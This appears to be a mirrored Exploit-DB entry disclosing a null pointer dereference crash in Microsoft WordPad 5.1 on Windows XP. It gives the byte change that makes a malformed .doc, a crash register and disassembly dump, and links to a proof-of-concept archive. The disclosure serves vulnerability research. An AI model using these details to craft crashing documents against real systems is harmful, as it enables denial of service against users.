Microsoft Wordpad 5.1 – ‘.doc’ Null Pointer Dereference

• Exploit Database
• 101 阅读

• 作者： condis
  日期： 2012-05-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18952/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability Found by condis   Tested on Windows XP SP 3 Proffesional PL MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)   This isn't bug from CWE 2009-0259   $ Binnary diff of template file (proper empty doc document) and malformed file (showing just the offset that differs):   0000 1200: 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 -- template file 0000 1200: 00 00 00 00 00 00 63 6F6E 64 00 00 00 00 00 00 -- proof of concept   Actually it doesn't matters (almost) what 4 bytes we will put there untill they != 0x00.   Access violation when reading [00000004]   $ Registers:   eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608 esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8 ebp = 0177f5cc   $ Function dump :   01b9dbb4 55pushebp 01b9dbb5 8becmov ebp,esp 01b9dbb7 56pushesi 01b9dbb8 8b7508mov esi,dword ptr [ebp+8] 01b9dbbb 807e0400cmp byte ptr [esi+4],0 ds:0023:00000004=?? ; ---- crash 01b9dbbf 751bjne mswrd8+0x1dbdc (01b9dbdc) 01b9dbc1 8b06mov eax,dword ptr [esi] 01b9dbc3 57pushedi 01b9dbc4 8b78fcmov edi,dword ptr [eax-4] 01b9dbc7 57pushedi 01b9dbc8 ff156010b801calldword ptr [mswrd8+0x1060 (01b81060)] 01b9dbce 57pushedi 01b9dbcf ff157410b801calldword ptr [mswrd8+0x1074 (01b81074)] 01b9dbd5 56pushesi 01b9dbd6 e87bfdffffcallmswrd8+0x1d956 (01b9d956) 01b9dbdb 5fpop edi 01b9dbdc 5epop esi 01b9dbdd 5dpop ebp   $ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3   $ Below You should see link to attachement with PoC:   http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar